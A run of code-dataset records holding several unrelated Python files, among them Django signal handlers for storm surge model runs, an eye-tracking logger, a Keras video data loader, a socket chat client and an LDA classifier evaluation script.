# query for all tracks of the parent advisory\n if adv is not None:\n advisory_tracks = sender.objects.all().filter(advisory=adv)\n\n # update the dependent_asgs_dev fields\n adv.dependent_asgs_dev = False\n adv.dependent_enable_public_dev = False\n adv.dependent_enable_adminmode_dev = False\n\n tracks_dev = advisory_tracks.filter(dependent_asgs_dev=1)\n if tracks_dev.count() > 0:\n adv.dependent_asgs_dev = True\n if tracks_dev.filter(dependent_enable_public_dev=1).count() > 0:\n adv.dependent_enable_public_dev = True\n if tracks_dev.filter(dependent_enable_adminmode_dev=1).count() > 0:\n adv.dependent_enable_adminmode_dev = True\n\n # update the dependent_asgs_pro fields\n adv.dependent_asgs_pro = False\n adv.dependent_enable_public_pro = False\n adv.dependent_enable_adminmode_pro = False\n\n tracks_pro = advisory_tracks.filter(dependent_asgs_pro=1)\n if tracks_pro.count() > 0:\n adv.dependent_asgs_pro = True\n if tracks_pro.filter(dependent_enable_public_pro=1).count() > 0:\n adv.dependent_enable_public_pro = True\n if tracks_pro.filter(dependent_enable_adminmode_pro=1).count() > 0:\n adv.dependent_enable_adminmode_pro = True\n\n # update the dependent_asgs_pub fields\n adv.dependent_asgs_pub = False\n adv.dependent_enable_public_pub = False\n adv.dependent_enable_adminmode_pub = False\n\n tracks_pub = advisory_tracks.filter(dependent_asgs_pub=1)\n if tracks_pub.count() > 0:\n adv.dependent_asgs_pub = True\n if tracks_pub.filter(dependent_enable_public_pub=1).count() > 0:\n adv.dependent_enable_public_pub = True\n if tracks_pub.filter(dependent_enable_adminmode_pub=1).count() > 0:\n adv.dependent_enable_adminmode_pub = True\n\n # update the dependent_asgs_nc fields\n adv.dependent_asgs_nc = False\n adv.dependent_enable_public_nc = False\n adv.dependent_enable_adminmode_nc = False\n\n tracks_nc = advisory_tracks.filter(dependent_asgs_nc=1)\n if tracks_nc.count() > 0:\n adv.dependent_asgs_nc = True\n if tracks_nc.filter(dependent_enable_public_nc=1).count() > 0:\n adv.dependent_enable_public_nc = True\n if tracks_nc.filter(dependent_enable_adminmode_nc=1).count() > 0:\n adv.dependent_enable_adminmode_nc = True\n\n # update the dependent_asgs_ng fields\n adv.dependent_asgs_ng = False\n adv.dependent_enable_public_ng = False\n adv.dependent_enable_adminmode_ng = False\n\n tracks_ng = advisory_tracks.filter(dependent_asgs_ng=1)\n if 
tracks_ng.count() > 0:\n adv.dependent_asgs_ng = True\n if tracks_ng.filter(dependent_enable_public_ng=1).count() > 0:\n adv.dependent_enable_public_ng = True\n if tracks_ng.filter(dependent_enable_adminmode_ng=1).count() > 0:\n adv.dependent_enable_adminmode_ng = True\n\n # update the dependent_asgs_pr fields\n adv.dependent_asgs_pr = False\n adv.dependent_enable_public_pr = False\n adv.dependent_enable_adminmode_pr = False\n\n tracks_pr = advisory_tracks.filter(dependent_asgs_pr=1)\n if tracks_pr.count() > 0:\n adv.dependent_asgs_pr = True\n if tracks_pr.filter(dependent_enable_public_pr=1).count() > 0:\n adv.dependent_enable_public_pr = True\n if tracks_pr.filter(dependent_enable_adminmode_pr=1).count() > 0:\n adv.dependent_enable_adminmode_pr = True\n\n # update the dependent_asgs_ri fields\n adv.dependent_asgs_ri = False\n adv.dependent_enable_public_ri = False\n adv.dependent_enable_adminmode_ri = False\n\n tracks_ri = advisory_tracks.filter(dependent_asgs_ri=1)\n if tracks_ri.count() > 0:\n adv.dependent_asgs_ri = True\n if tracks_ri.filter(dependent_enable_public_ri=1).count() > 0:\n adv.dependent_enable_public_ri = True\n if tracks_ri.filter(dependent_enable_adminmode_ri=1).count() > 0:\n adv.dependent_enable_adminmode_ri = True\n\n # update the dependent_asgs_st fields\n adv.dependent_asgs_st = False\n adv.dependent_enable_public_st = False\n adv.dependent_enable_adminmode_st = False\n\n tracks_st = advisory_tracks.filter(dependent_asgs_st=1)\n if tracks_st.count() > 0:\n adv.dependent_asgs_st = True\n if tracks_st.filter(dependent_enable_public_st=1).count() > 0:\n adv.dependent_enable_public_st = True\n if tracks_st.filter(dependent_enable_adminmode_st=1).count() > 0:\n adv.dependent_enable_adminmode_st = True\n\n #####\n # dependent_region handling\n # dependent_region for pro is nc/ng/nc_ng; no region for dev/st/pub (always nc_ng)\n\n adv.dependent_region_nc_ng = False\n tracks_region_nc_ng = advisory_tracks.filter(dependent_region_nc_ng = True)\n if tracks_region_nc_ng.count() > 0:\n adv.dependent_region_nc_ng = True\n\n adv.dependent_region_nc = False\n tracks_region_nc = advisory_tracks.filter(dependent_region_nc = True)\n if tracks_region_nc.count() > 0:\n adv.dependent_region_nc = True\n\n adv.dependent_region_ng = False\n tracks_region_ng = advisory_tracks.filter(dependent_region_ng = True)\n if tracks_region_ng.count() > 0:\n adv.dependent_region_ng = True\n\n adv.dependent_region_pr = False\n tracks_region_pr = advisory_tracks.filter(dependent_region_pr = True)\n if tracks_region_pr.count() > 0:\n adv.dependent_region_pr = True\n\n adv.dependent_region_ri = False\n tracks_region_ri = advisory_tracks.filter(dependent_region_ri = True)\n if tracks_region_ri.count() > 0:\n adv.dependent_region_ri = True\n \n adv.has_model_run = True\n adv.save(force_update=True)\n\n# register signal handlers for model 'track'\npost_save.connect(on_track_update, sender=track, dispatch_uid=\"track1\")\npost_delete.connect(on_track_update, sender=track, dispatch_uid=\"track2\")\n\n\n# signal handler will be called on new record/update of a record in\n# model 'adcrun_info' (post_save) and changes the 'dependent_xxx' fields\n# in the model 'track'\ndef on_adcrun_info_update(sender, **kwargs):\n\n changed_adcruninfo = kwargs.pop('instance', None)\n trk = changed_adcruninfo.track_id\n\n # query for all infos of the parent track\n if trk is not None:\n track_adcrun_infos = sender.objects.all().filter(track_id=trk)\n\n # update the dependent_asgs_dev fields\n trk.dependent_asgs_dev = False\n 
trk.dependent_enable_public_dev = False\n trk.dependent_enable_adminmode_dev = False\n\n adcruns_dev = track_adcrun_infos.filter(asgs_dev=1)\n if adcruns_dev.count() > 0:\n trk.dependent_asgs_dev = True\n if adcruns_dev.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_dev = True\n if adcruns_dev.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_dev = True\n\n # update the dependent_asgs_pro fields\n trk.dependent_asgs_pro = False\n trk.dependent_enable_public_pro = False\n trk.dependent_enable_adminmode_pro = False\n\n adcruns_pro = track_adcrun_infos.filter(asgs_pro=1)\n if adcruns_pro.count() > 0:\n trk.dependent_asgs_pro = True\n if adcruns_pro.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_pro = True\n if adcruns_pro.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_pro = True\n\n # update the dependent_asgs_pub fields\n trk.dependent_asgs_pub = False\n trk.dependent_enable_public_pub = False\n trk.dependent_enable_adminmode_pub = False\n\n adcruns_pub = track_adcrun_infos.filter(asgs_pub=1)\n if adcruns_pub.count() > 0:\n trk.dependent_asgs_pub = True\n if adcruns_pub.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_pub = True\n if adcruns_pub.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_pub = True\n\n # update the dependent_asgs_nc fields\n trk.dependent_asgs_nc = False\n trk.dependent_enable_public_nc = False\n trk.dependent_enable_adminmode_nc = False\n\n adcruns_nc = track_adcrun_infos.filter(asgs_nc=1)\n if adcruns_nc.count() > 0:\n trk.dependent_asgs_nc = True\n if adcruns_nc.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_nc = True\n if adcruns_nc.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_nc = True\n\n # update the dependent_asgs_ng fields\n trk.dependent_asgs_ng = False\n trk.dependent_enable_public_ng = False\n trk.dependent_enable_adminmode_ng = False\n\n adcruns_ng = track_adcrun_infos.filter(asgs_ng=1)\n if adcruns_ng.count() > 0:\n trk.dependent_asgs_ng = True\n if adcruns_ng.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_ng = True\n if adcruns_ng.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_ng = True\n\n # update the dependent_asgs_pr fields\n trk.dependent_asgs_pr = False\n trk.dependent_enable_public_pr = False\n trk.dependent_enable_adminmode_pr = False\n\n adcruns_pr = track_adcrun_infos.filter(asgs_pr=1)\n if adcruns_pr.count() > 0:\n trk.dependent_asgs_pr = True\n if adcruns_pr.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_pr = True\n if adcruns_pr.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_pr = True\n\n # and update the dependent_asgs_ri of the parent track\n trk.dependent_asgs_ri = False\n trk.dependent_enable_public_ri = False\n trk.dependent_enable_adminmode_ri = False\n\n adcruns_ri = track_adcrun_infos.filter(asgs_ri=1)\n if adcruns_ri.count() > 0:\n trk.dependent_asgs_ri = True\n if adcruns_ri.filter(enable_public=1).count() > 0:\n trk.dependent_enable_public_ri = True\n if adcruns_ri.filter(enable_adminmode=1).count() > 0:\n trk.dependent_enable_adminmode_ri = True\n\n # and update the dependent_asgs_st of the parent track\n trk.dependent_asgs_st = False\n trk.dependent_enable_public_st = False\n trk.dependent_enable_adminmode_st = False\n\n adcruns_st = track_adcrun_infos.filter(asgs_st=1)\n if adcruns_st.count() > 0:\n trk.dependent_asgs_st = True\n if 
adcruns_st.filter(enable_public=1).count() > 0:\n                trk.dependent_enable_public_st = True\n            if adcruns_st.filter(enable_adminmode=1).count() > 0:\n                trk.dependent_enable_adminmode_st = True\n\n        #####\n        # dependent_region handling\n        # dependent_region for pro is nc/ng/nc_ng; no region for dev/st/pub (always nc_ng)\n\n        trk.dependent_region_nc_ng = False\n        adcruns_region_nc_ng = track_adcrun_infos.filter(website_region='nc_ng')\n        if adcruns_region_nc_ng.count() > 0:\n            trk.dependent_region_nc_ng = True\n\n        trk.dependent_region_nc = False\n        adcruns_region_nc = track_adcrun_infos.filter(website_region='nc')\n        if adcruns_region_nc.count() > 0:\n            trk.dependent_region_nc = True\n\n        trk.dependent_region_ng = False\n        adcruns_region_ng = track_adcrun_infos.filter(website_region='ng')\n        if adcruns_region_ng.count() > 0:\n            trk.dependent_region_ng = True\n\n        trk.dependent_region_pr = False\n        adcruns_region_pr = track_adcrun_infos.filter(website_region='pr')\n        if adcruns_region_pr.count() > 0:\n            trk.dependent_region_pr = True\n\n        trk.dependent_region_ri = False\n        adcruns_region_ri = track_adcrun_infos.filter(website_region='ri')\n        if adcruns_region_ri.count() > 0:\n            trk.dependent_region_ri = True\n\n        trk.has_model_run = True\n        trk.save(force_update=True)\n\n##########################################################################\n# This will be called before a record is saved to the database. It's used\n# here to handle changed is_pseudo field values for the record being saved.\ndef on_adcrun_info_presave(sender, **kwargs):\n\n    new_adcruninfo = kwargs.pop('instance', None)\n    old_adcruninfo = sender.objects.all().filter(id=new_adcruninfo.id)\n\n    if len(old_adcruninfo) == 0:\n        return # new record, nothing to do\n\n    old_adcruninfo = old_adcruninfo[0]\n    if old_adcruninfo.is_pseudo == new_adcruninfo.is_pseudo:\n        return # is_pseudo has not changed, nothing to do\n\n    # dependent records for new adcinfo\n    new_track = new_adcruninfo.track_id\n    new_advisory = new_track.advisory\n    new_storm = new_advisory.storm\n    new_year = new_storm.year\n\n    # handle case when the record does not represent a pseudo storm anymore\n    year = int(new_year.year)\n    if old_adcruninfo.is_pseudo:\n        if year >= 90000:\n            year = year - 90000\n        thistrack = create_storm_records(year, \\\n            new_storm.storm_number, new_storm.stormname, new_storm.start_date_utc, \\\n            new_advisory.advisory, new_advisory.stormclass, \\\n            new_advisory.category, new_advisory.adv_time_utc, \\\n            new_track.track, new_track.mod_percent)\n\n    # handle case when the record now has to represent a pseudo storm\n    elif new_adcruninfo.is_pseudo:\n        if year < 90000:\n            year = year + 90000\n        thistrack = create_storm_records(year, \\\n            new_storm.storm_number, new_storm.stormname, new_storm.start_date_utc, \\\n            new_advisory.advisory, new_advisory.stormclass, \\\n            new_advisory.category, new_advisory.adv_time_utc, \\\n            new_track.track, new_track.mod_percent)\n\n    new_adcruninfo.track_id = thistrack\n\n    return\n\n###############################################################################\n# register signal handlers\npre_save.connect(on_adcrun_info_presave, sender=adcrun_info, dispatch_uid=\"adcrun1\")\npost_save.connect(on_adcrun_info_update, sender=adcrun_info, dispatch_uid=\"adcrun2\")\npost_delete.connect(on_adcrun_info_update, sender=adcrun_info, dispatch_uid=\"adcrun3\")\n
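# create_profile is presumably defined or imported elsewhere in this app; wiring\n# it to post_save on User keeps a profile row in sync with each new user.\n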
post_save.connect(create_profile, sender=User)\n\n","sub_path":"django/cerarisk/cera_data/adcircrun/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":69035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"629412766","text":"import os\nimport time\n# __import__(\"gazepoint.gazepoint\") returns the top-level 'gazepoint' package,\n# so the tracker class is reached below via gp.gazepoint.GazePoint\ngp = __import__(\"gazepoint.gazepoint\")\n\n\ndef main(interface, resolution):\n    # Gazepoint Control must be opened for tracking to work\n    print(\"Import successful\")\n    gazetracker = gp.gazepoint.GazePoint()\n    tile_generator = interface.tile_generator\n    canvas = interface.canvas\n    box_coords = interface.box_coords\n    folder_path = tile_generator.folder_path\n\n    current_level = tile_generator.level\n    previous_level = current_level\n\n    canvas_start_x = canvas.winfo_rootx()\n    canvas_start_y = canvas.winfo_rooty()\n    canvas_end_x = canvas_start_x + canvas.winfo_reqwidth()\n    canvas_end_y = canvas_start_y + canvas.winfo_reqheight()\n\n    csv_output = open(os.path.join(folder_path, \"Level \" + str(current_level) + \".csv\"), \"a\")\n\n    while interface.is_tracking:\n        box_coords = interface.box_coords\n        previous_level = current_level\n        current_level = tile_generator.level\n\n        # if the level changes, close the old csv and open a new csv file\n        if previous_level != current_level:\n            csv_output.close()\n            csv_output = open(os.path.join(folder_path, \"Level \" + str(current_level) + \".csv\"), \"a\")\n\n        x, y = gazetracker.get_gaze_position()\n        # returns a tuple with a value between 0 and 1, can also be negative if looking outside the screen\n        if x is not None and y is not None:\n            x *= resolution[0]\n            y *= resolution[1]\n\n            if x >= canvas_start_x and y >= canvas_start_y and x <= canvas_end_x and y <= canvas_end_y:\n                # position of canvas on screen is subtracted so that\n                # we can consider the top left of the viewer as the origin\n                x = x - canvas_start_x + box_coords[0]\n                y = y - canvas_start_y + box_coords[1]\n                csv_output.write(str(int(x)) + \",\" + str(int(y)) + \"\\\\n\")\n\n        time.sleep(0.1)\n\n    csv_output.close()\n    gazetracker.stop()\n","sub_path":"tracking.py","file_name":"tracking.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"22329172","text":"#!/usr/bin/env python\n\"\"\"\nUsage:\n    budget \n\"\"\"\n\nfrom docopt import docopt\nimport BudgetData\n\n\ndef main(args):\n    budget = BudgetData.Budget(args.get(\"\"))\n    budget.process(args.get(\"\"))\n    budget.report()\n    return\n\nif __name__ == '__main__':\n    args = docopt(__doc__)\n    main(args)\n","sub_path":"budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387706014","text":"import matplotlib.image as mpimg\nimport numpy as np\nfrom keras.utils import Sequence, to_categorical\n\n\nclass DataLoader():\n\n    def __init__(self, train_file, test_file, frames_count, frames_step, validation_split=0.0):\n        self.train_file = train_file\n        self.test_file = test_file\n        self.validation_split = validation_split\n        self.frames_count = frames_count\n        self.frames_step = frames_step\n\n        if self.validation_split < 0 or self.validation_split > 1:\n            raise ValueError(\"Invalid validation_split\")\n\n        self.read_files()\n        self.split()\n\n
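    # Illustrative usage (file names are hypothetical):\n    #   loader = DataLoader('train_list.txt', 'test_list.txt', frames_count=10,\n    #                       frames_step=2, validation_split=0.1)\n    #   train_gen = loader.train_generator(batch_size=16)\n\n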
    def read_files(self):\n        # Training data\n        with open(self.train_file, 'r') as f:\n            training_path = [f for f in map(lambda s: s.strip(),f.readlines())]\n\n        self.train_videos = {}\n        for path in training_path:\n            split = path.split('/')\n            video = '/'.join(split[:-1])\n            frame = split[-1]\n\n            if self.train_videos.get(video) is None:\n                self.train_videos[video] = []\n\n            self.train_videos[video].append(frame)\n\n        # Test data\n        with open(self.test_file, 'r') as f:\n            test_path = [f for f in map(lambda s: tuple(s.strip().split()),f.readlines())]\n\n        self.test_videos = {}\n        self.normal_frames = {}\n        self.abnormal_frames = {}\n\n        for (path, abnormal) in test_path:\n            split = path.split('/')\n            video = '/'.join(split[:-1])\n            frame = split[-1]\n\n            if self.test_videos.get(video) is None:\n                self.test_videos[video] = []\n\n            self.test_videos[video].append(frame)\n            if int(abnormal):\n                if self.abnormal_frames.get(video) is None:\n                    self.abnormal_frames[video] = []\n                self.abnormal_frames[video].append(frame)\n            else:\n                if self.normal_frames.get(video) is None:\n                    self.normal_frames[video] = []\n                self.normal_frames[video].append(frame)\n\n\n    def split(self):\n        if self.validation_split > 0:\n            n = len(self.train_videos)\n            num_val = int(n * self.validation_split)\n            num_train = n - num_val\n\n            keys = np.array(list(self.train_videos.keys()))\n            val_idx = np.random.choice(range(0, n), num_val, replace=False)\n\n            val_keys = keys[val_idx]\n            train_keys = np.delete(keys, val_idx, axis=0)\n\n            videos = self.train_videos\n            self.train_videos = {}\n            self.validation_videos = {}\n\n            for k in train_keys:\n                self.train_videos[k] = videos[k]\n            for k in val_keys:\n                self.validation_videos[k] = videos[k]\n\n    def train_generator(self, **kwargs):\n        prefix = '/'.join(self.train_file.split('/')[:-1]) + '/'\n        return DataGenerator(self.train_videos, sequenceLength=self.frames_count, sequenceStep=self.frames_step, pathPrefix=prefix, **kwargs)\n\n    def validation_generator(self, **kwargs):\n        if self.validation_split == 0.0:\n            raise ValueError(\"Validation split set to zero!\")\n        prefix = '/'.join(self.train_file.split('/')[:-1]) + '/'\n        return DataGenerator(self.validation_videos, sequenceLength=self.frames_count, sequenceStep=self.frames_step, pathPrefix=prefix, **kwargs)\n\n    def test_generator(self, only_normal=None, **kwargs):\n        # if only_normal is None: every test sequence\n        # if only_normal is True: only sequences with normal frames at the end\n        # if only_normal is False: only sequences with abnormal frames at the end\n\n        prefix = '/'.join(self.test_file.split('/')[:-1]) + '/'\n        f = None\n        if only_normal is not None:\n            f = self.normal_frames if only_normal else self.abnormal_frames\n        return DataGenerator(self.test_videos, sequenceLength=self.frames_count, sequenceStep=self.frames_step, pathPrefix=prefix, data_filter=f, **kwargs)\n\nclass DataGenerator(Sequence):\n    'Generates data for Keras'\n    def __init__(self, videos, sequenceLength=10, sequenceStep=1, batch_size=32, shuffle=True, pathPrefix='', data_filter=None, filter_ratio=1):\n        'Initialization'\n        self.videos = videos\n        self.sequenceLength = sequenceLength\n        self.sequenceStep = sequenceStep\n        self.batch_size = batch_size\n        self.shuffle = shuffle\n        self.pathPrefix = pathPrefix\n\n        self.data = []\n        self.totalLength = 0\n\n        self.totalSequenceLength = self.sequenceStep * (self.sequenceLength - 1) + 1\n\n        for key, frames in self.videos.items():\n            self.totalLength += len(frames)\n\n            choice = []\n            if data_filter is None:\n                choice = list(map(lambda pos: (key, pos), range(len(frames[:-self.totalSequenceLength+1]))))\n            elif data_filter.get(key) is not None:\n                for pos in range(len(frames[:-self.totalSequenceLength+1])):\n                    count = 0\n                    for j in range(pos, pos+self.totalSequenceLength):\n                        if frames[j] in data_filter.get(key):\n                            count += 1\n\n                    if count >= 
self.totalSequenceLength * filter_ratio:\n choice.append((key, pos))\n\n self.data += choice\n\n self.len = int(np.ceil(len(self.data) / self.batch_size))\n \n k = list(self.videos.keys())[0]\n sample_filepath = self.videos[k][0]\n sample = self.read_frame(k, sample_filepath)\n self.data_shape = sample.shape\n\n if len(self.data_shape) == 2:\n self.X_shape = (*self.data_shape, 1)\n self.Y_shape = (*self.data_shape, 256)\n else:\n self.X_shape = self.data_shape\n self.Y_shape = (*self.data_shape, 256)\n\n self.on_epoch_end()\n\n def read_frame(self, k, f):\n return mpimg.imread(self.pathPrefix + k + '/' + f)\n\n def __len__(self):\n 'Denotes the number of batches per epoch'\n return self.len\n\n def on_epoch_end(self):\n 'Updates indexes after each epoch'\n self.indexes = np.arange(len(self.data))\n if self.shuffle == True:\n np.random.shuffle(self.indexes)\n\n def __getitem__(self, index):\n 'Generate one batch of data'\n # Generate indexes of the batch\n indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]\n\n # Find list of IDs\n data_temp = [self.data[k] for k in indexes]\n\n # Generate data\n X, Y = self.__data_generation(data_temp)\n\n return X, Y\n\n def __data_generation(self, data_temp):\n 'Generates data containing batch_size samples'\n # Initialization\n X = np.empty((len(data_temp), self.sequenceLength, *self.X_shape))\n Y = np.empty((len(data_temp), self.sequenceLength, *self.Y_shape))\n \n # Generate data\n for i, datum in enumerate(data_temp):\n key, pos = datum\n frames = self.videos[key][pos:pos+self.totalSequenceLength]\n k = 0\n for j, frame in enumerate(frames):\n if j % self.sequenceStep == 0:\n raw = self.read_frame(key, frame)\n X[i, k,] = raw.reshape(self.X_shape)\n Y[i, k,] = to_categorical(raw, num_classes=256)\n k += 1\n\n\n return X, Y\n","sub_path":"videopixelnetworks/data/DataLoader.py","file_name":"DataLoader.py","file_ext":"py","file_size_in_byte":7365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"160027031","text":"class Solution:\n def bs(self, A, i,j,t):\n \n if j-i <= 3:\n for ix in range(i, j+1):\n if t <= A[ix]:\n return ix\n return j+1\n \n m = (i+j)//2\n \n if t == A[m]:\n return m\n elif t > A[m]:\n return self.bs(A, m+1, j, t)\n else:\n return self.bs(A, i, m-1, t)\n \n \n def binary_insertion (self, lst, n):\n i = self.bs(lst, 0, len(lst)-1, n)\n return lst[:i]+ [n] + lst[i:] \n \n \n def binary_deletion (self, lst, n):\n i = self.bs(lst, 0, len(lst)-1, n)\n del lst[i]\n return lst\n\n \n def findAnagrams(self, s: str, p: str) -> List[int]:\n p_sub = sorted(p)\n s_sub = sorted(s[0: len(p)-1])\n r = []\n \n lp = len(p)-1\n \n for i in range(lp, len(s)):\n start = i-lp\n s_sub = self.binary_insertion(s_sub, s[i])\n \n if s_sub == p_sub:\n r.append(start)\n \n s_sub = self.binary_deletion(s_sub, s[start])\n \n return r\n ","sub_path":"week3/sorting/find-all-anagrams-in-a-string.py","file_name":"find-all-anagrams-in-a-string.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"647024983","text":"from .. import Recipe\nfrom . 
import RawIngredient\n\n\nORE_STACK_SIZE = 200\n\nRawWood = RawIngredient('Raw Wood', 100)\nResin = Recipe('Resin', 1, 5, [(RawWood, 5)])\nWood = Recipe('Wood', 2, 0.5, [(RawWood, 1)])\nWoodBoard = Recipe('Wooden Board', 2, 0.5, [(Wood, 1)])\nWoodBlock = RawIngredient('Wood Block', 200)\nSand = RawIngredient('Sand', 200)\n\nCarbon = RawIngredient('Carbon', 200)\nCoke = RawIngredient('Coke', 200)\nPlastic = RawIngredient('Plastic', 100)\nNaOH = RawIngredient('Sodium Hydroxide', 200)\nCaCl = RawIngredient('Calcium Chloride', 200)\nLimestone = RawIngredient('Limestone', 200)\nStone = RawIngredient('Stone', ORE_STACK_SIZE)\n\nIronOre = RawIngredient('Iron Ore', ORE_STACK_SIZE)\n\nSiNO3 = RawIngredient('Silicon Nitride', 100)\nSiliconOre = RawIngredient('Silicon Ore', ORE_STACK_SIZE)\n\n\n\n\n\nBrick = RawIngredient('Stone Brick', 100)\n\nCobaltOxide = Recipe('Cobalt Oxide', 24, 4, [(Limestone, 6)], base=True, stack_size=100)\nTungstenOxide = RawIngredient('Tungsten Oxide', 100)\nSilverZincBattery = RawIngredient('Silver Zinc Battery', 200)\nRocketFuel = RawIngredient('Rocket Fuel', 100)\nAgNO3 = RawIngredient('Silver Nitrate', 100)\n","sub_path":"factorio/ingredients/raw.py","file_name":"raw.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"642480118","text":"import socket\r\nimport time\r\nimport threading\r\nimport sys\r\nimport bytepacker\r\n\r\npacketPrefixes = {\r\n\t\"authRequest\": 0xE0,\r\n\t\"authAccept\": 0xE1,\r\n\t\"sendMessage\": 0xE2,\r\n\t\"recvMessage\": 0xE3\r\n}\r\n\r\ndef connect(sock, addr, timeout):\r\n\tstartTime = time.time()\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\tif time.time() - startTime > timeout:\r\n\t\t\t\treturn False\r\n\t\t\tsock.connect(addr)\r\n\t\texcept ConnectionRefusedError:\r\n\t\t\tcontinue\r\n\t\tbreak\r\n\treturn True\r\n\r\nuser = input(\"Enter username: \")\r\n\r\n#connect and request authentication\r\nclientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nif connect(clientSocket, (\"127.0.0.1\", 7529), 5):\r\n\tbuilder = bytepacker.BytesBuilder()\r\n\tbuilder.writeBytes(bytes([packetPrefixes[\"authRequest\"]]))\r\n\tbuilder.writeString(user)\r\n\tclientSocket.send(builder.getBytes())\r\nelse:\r\n\tprint(\"Cannot reach server.\")\r\n\tquit()\r\n\r\n#authentication response\r\ndata = clientSocket.recv(1024)\r\nif data:\r\n\tbuilder = bytepacker.BytesBuilder(data)\r\n\tif builder.readBytes(1)[0] == packetPrefixes[\"authAccept\"]:\r\n\t\tprint(\"Logged in as {}.\".format(user))\r\n\telse:\r\n\t\tprint(\"Unexpected authentication response.\")\r\n\t\tquit()\r\nelse:\r\n\tprint(\"Server did not respond.\")\r\n\tquit()\r\n\r\nclass ChatThread(threading.Thread):\r\n\tdef __init__(self):\r\n\t\tthreading.Thread.__init__(self)\r\n\r\n\tdef run(self):\r\n\t\twhile True:\r\n\t\t\tmsg = input()\r\n\t\t\tbuilder = bytepacker.BytesBuilder()\r\n\t\t\tbuilder.writeBytes(bytes([packetPrefixes[\"sendMessage\"]]))\r\n\t\t\tbuilder.writeString(msg)\r\n\t\t\tclientSocket.send(builder.getBytes())\r\n\r\nclass ReceiveThread(threading.Thread):\r\n\tdef __init__(self):\r\n\t\tthreading.Thread.__init__(self)\r\n\r\n\tdef run(self):\r\n\t\twhile True:\r\n\t\t\tbuilder = bytepacker.BytesBuilder(clientSocket.recv(1024))\r\n\t\t\tif builder.readBytes(1)[0] == packetPrefixes[\"recvMessage\"]:\r\n\t\t\t\tmsg = builder.readString()\r\n\t\t\t\tsender = builder.readString()\r\n\t\t\t\tprint(sender + \": \" + msg)\r\n\r\n#start sending messages and listening to server\r\nchat = 
ChatThread()\r\nchat.start()\r\n\r\nrecv = ReceiveThread()\r\nrecv.start()","sub_path":"chatclient.py","file_name":"chatclient.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"478770686","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\r\nfrom sklearn.metrics import classification_report, confusion_matrix, \\\r\n accuracy_score, roc_curve, auc, log_loss\r\nfrom mlxtend.plotting import plot_confusion_matrix\r\n\r\n\r\ndef lda(x_train, x_test, y_train, y_test):\r\n \"\"\"Train the linear discriminant analysis\r\n\r\n :param x_train: de target van de trainingset (0 of 1)\r\n :param x_test: de target van de testset (0 of 1)\r\n :param y_train: volledige parameters van de trainingset\r\n :param y_test: volledige parameters van de test set\r\n :return: print classificatie report, confusion matrix and ROC curve\r\n \"\"\"\r\n print(\"##########LINEAR DISCRIMINANT ANALYSIS##########\")\r\n lda = LinearDiscriminantAnalysis()\r\n lda.fit(x_train, y_train)\r\n\r\n # cross validation\r\n lda_accuracy = np.mean(cross_val_score(lda, x_train, y_train, cv=5,\r\n scoring=\"accuracy\"))\r\n print(\"mean accuracy:\", round(lda_accuracy, 2))\r\n print(\"accuracy:\", round(lda.score(x_test, y_test), 2))\r\n\r\n y_pred = lda.predict(x_test)\r\n y_pred_proba = lda.predict_proba(x_test)[:, 1]\r\n\r\n # Confusion matrix\r\n cm = confusion_matrix(y_test, y_pred)\r\n fig, ax = plot_confusion_matrix(conf_mat=cm)\r\n plt.rcParams['font.size'] = 20\r\n plt.title(\"LDA\")\r\n plt.show()\r\n\r\n print(classification_report(y_test, y_pred))\r\n\r\n [fpr, tpr, thr] = roc_curve(y_test, y_pred_proba)\r\n print('Train/Test split results:')\r\n print(lda.__class__.__name__ + \" accuracy is %2.3f\" % accuracy_score(\r\n y_test, y_pred))\r\n print(\r\n lda.__class__.__name__ + \" log_loss is %2.3f\" % log_loss(y_test,\r\n y_pred_proba))\r\n print(lda.__class__.__name__ + \" auc is %2.3f\" % auc(fpr, tpr))\r\n\r\n idx = np.min(np.where(\r\n tpr > 0.95)) # index of the first threshold for which the\r\n # sensibility > 0.95\r\n\r\n # Plot ROC curve\r\n plt.figure(figsize=(10, 10))\r\n plt.plot(fpr, tpr, color='coral',\r\n label='ROC curve (area = %0.3f)' % auc(fpr, tpr))\r\n plt.plot([0, 1], [0, 1], 'k--')\r\n plt.plot([0, fpr[idx]], [tpr[idx], tpr[idx]], 'k--')\r\n plt.plot([fpr[idx], fpr[idx]], [0, tpr[idx]], 'k--')\r\n plt.xlim([0.0, 1.0])\r\n plt.ylim([0.0, 1.05])\r\n plt.xlabel('False Positive Rate (1 - specificity)', fontsize=10)\r\n plt.ylabel('True Positive Rate (recall)', fontsize=10)\r\n plt.title('lda Receiver operating characteristic (ROC) curve')\r\n plt.legend(loc=\"lower right\")\r\n 